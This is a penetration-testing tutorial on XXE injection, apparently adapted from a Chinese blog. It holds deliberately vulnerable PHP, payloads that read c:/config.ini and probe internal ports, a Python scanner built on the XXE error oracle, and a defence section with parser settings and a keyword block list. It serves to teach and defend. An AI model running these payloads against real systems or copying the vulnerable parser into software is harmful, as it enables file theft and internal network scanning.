The Road to Penetration Testing, Basics - XXE Injection Vulnerability

XXE Vulnerability

XXE stands for XML External Entity injection. The vulnerability occurs when an application parses XML input without disabling the loading of external entities, so an attacker-supplied document can make the parser fetch an external resource of the attacker's choosing. Depending on the parser and its environment this allows arbitrary file reads, command execution (only in special setups, such as PHP with the expect extension installed), scanning of internal network ports, attacks on internal websites (SSRF), denial of service and other impacts. A common trigger point is any place where an XML file can be uploaded, or an XML body submitted, without filtering, so that a malicious XML document reaches the parser.

It is similar to a file inclusion vulnerability: the application loads an XML file, and the entity declared in that file pulls in a configuration file, which is how the injection is realised.

Vulnerable code (test.php):

<?php
// Deliberately vulnerable: the XML source comes straight from the query string
// and is parsed with external entity loading left enabled.
$xml = $_GET['x'];
$data = simplexml_load_file($xml);
var_dump($data);
?>

simplexml_load_file only resolves external entities on older setups; the original notes that PHP must be below 5.5.38. What actually decides it is the libxml2 version PHP is built against: from libxml2 2.9.0 onward external entity loading is disabled by default, so check the libXML version in the output of php -i (or the LIBXML_DOTTED_VERSION constant) before assuming the lab is exploitable.

Reading arbitrary files

The payload file.xml is as follows:

<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
    <!ENTITY file SYSTEM "file:///c:/config.ini">
]>
<x>&file;</x>
<!-- reference the external entity -->

Access http://192.168.80.128/test/xml/test.php?x=file.xml and the contents of c:/config.ini are dumped inside the x element.
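What the vulnerable parser actually does with file.xml, as an added example that is not part of the original page: it is written against Python's standard-library expat binding so it runs offline. parse_with_entities mirrors the behaviour of the test.php setup above (a parser that honours external entities); it is not PHP's or libxml's own code. The config.ini file, its contents and the temporary path are constructed for the demonstration.

```python
import tempfile
import xml.parsers.expat as expat
from pathlib import Path
from urllib.parse import urlsplit
from urllib.request import url2pathname


def xxe_payload(file_url: str) -> bytes:
    """Same shape as file.xml above: declare an external general entity and
    reference it inside <x>, so whatever it expands to becomes element text."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE ANY [\n"
        f'    <!ENTITY file SYSTEM "{file_url}">\n'
        "]>\n"
        "<x>&file;</x>\n"
    ).encode("utf-8")


def parse_with_entities(doc: bytes) -> str:
    """Vulnerable parser: fetches file:// external entities and returns the
    text content of the document, leaked file included."""
    text = []
    parser = expat.ParserCreate()

    def on_external_entity(context, base, system_id, public_id):
        # This callback is the XXE primitive: the parser is asked to fetch the
        # entity's SYSTEM identifier and feed the bytes back in as content.
        url = urlsplit(system_id)
        if url.scheme != "file":
            return 0  # only file:// is simulated here; 0 makes expat error out
        with open(url2pathname(url.path), "rb") as fh:
            body = fh.read()
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = text.append
        child.Parse(body, True)
        return 1

    parser.CharacterDataHandler = text.append
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(doc, True)
    return "".join(text)


def demo() -> str:
    """Create a throw-away config.ini (constructed sample, not a real secret),
    build the payload for it and show the vulnerable parser leaking it."""
    cfg = Path(tempfile.mkdtemp(), "config.ini")
    cfg.write_text("db_user=admin\ndb_pass=s3cr3t\n", encoding="utf-8")
    return parse_with_entities(xxe_payload(cfg.as_uri()))


if __name__ == "__main__":
    print(demo())
```

The whole attack is the ExternalEntityRefHandler: a parser that fetches whatever SYSTEM identifier the DTD names, and then treats the fetched bytes as document content, will hand the file back to whoever reads the parsed result, which is exactly what var_dump does in test.php.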

Port scanning

The payload port.xml is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root>
<name>&xxe;</name>
</root>

Access http://192.168.80.128/test/xml/test.php?x=port.xml

No error is returned, which indicates that port 80 is open.

If the entity is pointed at a closed port instead, for example 180, and the same URL is accessed again:

Access http://192.168.80.128/test/xml/test.php?x=port.xml

the parser cannot fetch the entity and the response carries a libxml warning (typically "failed to load external entity"). That difference between the two responses is the oracle: one request per port reveals which internal ports are listening, and pointing the entity at other internal hosts turns the same trick into an internal network scan.
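The port-scan oracle above driven from an attacker-side script, as an added example that is not from the original page. The TARGET URL is the lab host used on the page, the error signature is libxml's usual fetch warning, and delivery through PHP's data:// stream wrapper (so no upload is needed) assumes allow_url_fopen is enabled on the target, which is PHP's default; fake_fetch is a constructed stand-in for the lab server so the scanner runs offline.

```python
import base64
import re
from typing import Callable, Dict, Iterable
from urllib.parse import quote, unquote
from urllib.request import urlopen

# Lab endpoint from the page; change to your own target. Assumes the target has
# allow_url_fopen enabled (PHP's default) so simplexml_load_file accepts data://.
TARGET = "http://192.168.80.128/test/xml/test.php"
# libxml's I/O warning when the entity fetch fails (connection refused etc.).
ERROR_SIG = "failed to load external entity"


def port_probe_payload(host: str, port: int) -> str:
    """Same shape as port.xml above, with the target host:port parameterised."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE root [\n"
        "    <!ELEMENT name ANY >\n"
        f'    <!ENTITY xxe SYSTEM "http://{host}:{port}">\n'
        "]>\n"
        "<root><name>&xxe;</name></root>\n"
    )


def data_uri(payload: str) -> str:
    """Wrap the document in PHP's data:// stream wrapper. The base64 is URL
    encoded because a bare '+' in a query string would decode to a space."""
    b64 = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    return f"{TARGET}?x=data://text/plain;base64,{quote(b64, safe='')}"


def classify(body: str, error_sig: str = ERROR_SIG) -> str:
    """Open ports parse without the fetch warning; closed ones produce it."""
    return "closed" if error_sig in body else "open"


def scan(host: str, ports: Iterable[int], fetch: Callable[[str], str]) -> Dict[int, str]:
    """One request per port; fetch(url) must return the HTTP response body."""
    return {port: classify(fetch(data_uri(port_probe_payload(host, port)))) for port in ports}


def http_fetch(url: str) -> str:
    """Real transport for use against a lab target."""
    with urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def fake_fetch(url: str) -> str:
    """Constructed stand-in for the lab server so the scanner can be exercised
    offline: decodes the data:// payload and pretends only 80 and 3306 listen."""
    b64 = url.split("base64,", 1)[1]
    doc = base64.b64decode(unquote(b64)).decode("utf-8")
    port = int(re.search(r'SYSTEM "http://[^"]*:(\d+)"', doc).group(1))
    if port in (80, 3306):
        return 'object(SimpleXMLElement)#1 (1) {\n  ["name"]=>\n  string(0) ""\n}'
    return (
        "Warning: simplexml_load_file(): I/O warning : "
        f'failed to load external entity "http://127.0.0.1:{port}"'
    )


if __name__ == "__main__":
    for port, state in scan("127.0.0.1", [22, 80, 180, 3306], fake_fetch).items():
        print(port, state)
```

Real responses vary more than the stand-in does: an open port that returns HTML may trigger parser warnings of its own, so calibrate error_sig against a known-closed port before trusting the classification. To run it against the lab, pass http_fetch instead of fake_fetch.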

A CTF challenge

http://web.jarvisoj.com:9882/

  • The response is returned in JSON format

  • Capture the request with Burp and analyse it

  • Try injecting XML into the request and resend the captured packet

XML backdoors

PHP can also generate XML dynamically, and the same parsing behaviour can be abused to plant a backdoor.

Defending against XXE attacks

Use the method your development language provides to disable external entities:

PHP:

libxml_disable_entity_loader(true);

Note that this function is deprecated as of PHP 8.0 because libxml2 2.9.0 and later disable external entity loading by default; on current versions the thing to check is that LIBXML_NOENT is never passed to the parsing functions, since that flag turns entity substitution back on.

Java:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

On its own setExpandEntityReferences(false) is not sufficient; the reliable fix (as recommended in the OWASP XXE prevention cheat sheet) is to also enable the feature http://apache.org/xml/features/disallow-doctype-decl on the factory, which rejects any DOCTYPE before an entity can be declared.

Python:

from lxml import etree

# resolve_entities=False stops lxml from substituting entity references.
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))

Filter the XML data submitted by users

Filter out the keywords <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.

Do not allow the XML document to carry its own DTD definitions (a DOCTYPE with an internal or external subset).
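The keyword filter suggested above next to a parser-level rule that refuses any DTD, as an added example that is not from the original page; it uses Python's standard-library expat binding rather than any particular framework's API. The two documents are constructed for the demonstration. The point it shows: a byte-level filter for the keywords misses the same document encoded as UTF-16, while a parser that aborts on the DOCTYPE declaration catches it regardless of encoding.

```python
import xml.parsers.expat as expat
from typing import List

# The keyword filter suggested above, applied to the raw request bytes.
BLOCKLIST = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM", b"PUBLIC")


def keyword_filter_allows(raw: bytes) -> bool:
    return not any(keyword in raw for keyword in BLOCKLIST)


class DtdRejected(Exception):
    """Raised as soon as the parser sees a DOCTYPE or an entity declaration."""


def parse_without_dtd(raw: bytes) -> List[str]:
    """Parser-level rule: no DTD of any kind, and no external entity is ever
    fetched. Returns the element names seen, standing in for real processing."""
    parser = expat.ParserCreate()
    seen: List[str] = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} refused")

    def on_entity_decl(*args):
        raise DtdRejected("entity declaration refused")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = lambda *args: 0  # refuse, never fetch
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(raw, True)  # expat re-raises exceptions from handlers
    return seen


def check(raw: bytes) -> str:
    """Run both defences in order and report which one stopped the document."""
    if not keyword_filter_allows(raw):
        return "blocked by keyword filter"
    try:
        parse_without_dtd(raw)
    except DtdRejected:
        return "blocked by parser"
    return "parsed"


# Constructed inputs. The XXE document has no encoding declaration so the same
# text can be served as UTF-8 and, with a byte order mark, as UTF-16.
XXE_DOC = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE x [<!ENTITY f SYSTEM "file:///c:/config.ini">]>\n'
    "<x>&f;</x>"
)
BENIGN_DOC = '<?xml version="1.0"?>\n<order><item>1</item></order>'

XXE_UTF8 = XXE_DOC.encode("utf-8")
XXE_UTF16 = XXE_DOC.encode("utf-16")  # BOM + 2 bytes per char: no ASCII "<!DOCTYPE"
BENIGN_UTF8 = BENIGN_DOC.encode("utf-8")


if __name__ == "__main__":
    for label, raw in (("utf-8 xxe", XXE_UTF8), ("utf-16 xxe", XXE_UTF16), ("benign", BENIGN_UTF8)):
        print(label, "->", check(raw))
```

The keyword list also rejects harmless documents that happen to contain the words SYSTEM or PUBLIC in their text, and any encoding the parser accepts but the filter does not understand slips past it. Refusing the DOCTYPE at parser level has neither problem, which is why it is the rule to rely on and the keyword filter is at best a second layer.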

https://www.cnblogs.com/miyeah/p/4526088.html

Introducing an external DTD file

Instead of declaring the entity in the document's own internal subset, the DOCTYPE declaration can reference a DTD hosted elsewhere by its SYSTEM identifier (a URL), with the ENTITY declaration placed in that external DTD. The parser fetches the DTD, declares the entity and expands it exactly as before. Write the XML document (xxe-dtd.xml) so that it references the external DTD, then

Access http://192.168.80.128/test/xml/test.php?x=xxe-dtd.xml

and the file contents are read out, achieving the same file read as the inline payload. This variant also gets past a filter that only looks for <!ENTITY in the submitted document, since the declaration never appears in it.


Source: www.cnblogs.com/r0ckysec/p/11532013.html